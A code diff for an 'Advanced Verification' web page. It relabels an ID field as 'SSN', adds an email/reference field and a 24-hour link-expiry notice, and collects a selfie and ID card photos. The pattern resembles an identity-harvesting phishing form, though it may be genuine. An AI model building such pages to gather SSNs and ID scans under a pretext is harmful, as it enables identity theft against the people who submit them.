--- a/advanced-verification.html
+++ b/advanced-verification.html
@@ -99,7 +99,7 @@
       position: relative;
       max-width: 90vw;
       max-height: 90vh;
-      background-color: #1f2937;
+      background-color: #ffffff;
       border-radius: 1rem;
       padding: 1rem;
     }
@@ -119,7 +119,6 @@
       display: none;
     }
   </style>
-  <script type="module" src="/src/js/advanced-verification.js"></script>
 </head>
 <body class="bg-white text-gray-900">
   <div class="min-h-screen flex items-center justify-center p-4 py-8">
@@ -136,11 +135,25 @@
           <h2 class="text-2xl font-bold text-gray-900 mb-2">Advanced Verification</h2>
           <p class="text-gray-600">Complete your identity verification to access all features</p>
         </div>
+
+        <!-- Warning Notice -->
+        <div class="mb-6 p-4 bg-yellow-50 border-l-4 border-yellow-500 rounded-r-lg">
+          <div class="flex items-start">
+            <svg class="w-5 h-5 text-yellow-600 mt-0.5 mr-3 flex-shrink-0" fill="currentColor" viewBox="0 0 20 20">
+              <path fill-rule="evenodd" d="M8.257 3.099c.765-1.36 2.722-1.36 3.486 0l5.58 9.92c.75 1.334-.213 2.98-1.742 2.98H4.42c-1.53 0-2.493-1.646-1.743-2.98l5.58-9.92zM11 13a1 1 0 11-2 0 1 1 0 012 0zm-1-8a1 1 0 00-1 1v3a1 1 0 002 0V6a1 1 0 00-1-1z" clip-rule="evenodd"></path>
+            </svg>
+            <div>
+              <p class="text-sm text-yellow-800 font-medium">
+                <strong>Important:</strong> This verification link is valid for 24 hours. After 24 hours, kindly request another.
+              </p>
+            </div>
+          </div>
+        </div>
         
         <form id="verification-form" class="space-y-6">
-          <!-- ID Number -->
+          <!-- SSN -->
           <div>
-            <label for="id_number" class="block text-sm font-medium text-gray-700 mb-2">ID Number</label>
+            <label for="ssn" class="block text-sm font-medium text-gray-700 mb-2">SSN</label>
             <div class="input-group">
               <svg class="input-icon w-5 h-5" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                 <path d="M16 21v-2a4 4 0 0 0-4-4H6a4 4 0 0 0-4 4v2"></path>
@@ -148,14 +161,26 @@
                 <path d="M22 21v-2a4 4 0 0 0-3-3.87"></path>
                 <path d="M16 3.13a4 4 0 0 1 0 7.75"></path>
               </svg>
-              <input type="text" id="id_number" name="id_number" required class="w-full bg-gray-50 border border-gray-300 rounded-lg py-3 pl-12 pr-4 focus:ring-2 focus:ring-[#009296] focus:border-[#009296] focus:outline-none text-gray-900" placeholder="Enter your ID number">
+              <input type="text" id="ssn" name="ssn" required class="w-full bg-gray-50 border border-gray-300 rounded-lg py-3 pl-12 pr-4 focus:ring-2 focus:ring-[#009296] focus:border-[#009296] focus:outline-none text-gray-900" placeholder="Enter your SSN">
+            </div>
+          </div>
+
+          <!-- Email/Reference Number -->
+          <div>
+            <label for="email_reference" class="block text-sm font-medium text-gray-700 mb-2">Email Address/Reference Number</label>
+            <div class="input-group">
+              <svg class="input-icon w-5 h-5" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
+                <path d="M4 4h16c1.1 0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1 0-2-.9-2-2V6c0-1.1.9-2 2-2z"></path>
+                <polyline points="22,6 12,13 2,6"></polyline>
+              </svg>
+              <input type="text" id="email_reference" name="email_reference" class="w-full bg-gray-50 border border-gray-300 rounded-lg py-3 pl-12 pr-4 focus:ring-2 focus:ring-[#009296] focus:border-[#009296] focus:outline-none text-gray-900" placeholder="Enter email address or reference number">
             </div>
           </div>
 
           <!-- Selfie Upload -->
           <div>
             <label class="block text-sm font-medium text-gray-700 mb-2">Selfie Photo</label>
-            <p class="text-xs text-gray-500 mb-3">Take a clear selfie or upload a photo of yourself</p>
+            <p class="text-xs text-gray-600 mb-3">Take a clear selfie or upload a photo of yourself</p>
             <div class="photo-upload-area" id="selfie-upload-area">
               <input type="file" id="selfie-file" name="selfie" accept="image/*" class="hidden">
               <input type="hidden" id="selfie-data" name="selfie_data">
@@ -181,7 +206,7 @@
           <!-- ID Card Front -->
           <div>
             <label class="block text-sm font-medium text-gray-700 mb-2">ID Card Front</label>
-            <p class="text-xs text-gray-500 mb-3">Upload or take a photo of the front of your ID card</p>
+            <p class="text-xs text-gray-600 mb-3">Upload or take a photo of the front of your ID card</p>
             <div class="photo-upload-area" id="id-front-upload-area">
               <input type="file" id="id-front-file" name="id_front" accept="image/*" class="hidden">
               <input type="hidden" id="id-front-data" name="id_front_data">
@@ -207,7 +232,7 @@
           <!-- ID Card Back -->
           <div>
             <label class="block text-sm font-medium text-gray-700 mb-2">ID Card Back</label>
-            <p class="text-xs text-gray-500 mb-3">Upload or take a photo of the back of your ID card</p>
+            <p class="text-xs text-gray-600 mb-3">Upload or take a photo of the back of your ID card</p>
             <div class="photo-upload-area" id="id-back-upload-area">
               <input type="file" id="id-back-file" name="id_back" accept="image/*" class="hidden">
               <input type="hidden" id="id-back-data" name="id_back_data">
@@ -254,6 +279,7 @@
       </div>
     </div>
   </div>
+  <script type="module" src="/src/js/advanced-verification.js"></script>
 </body>
 </html>
 
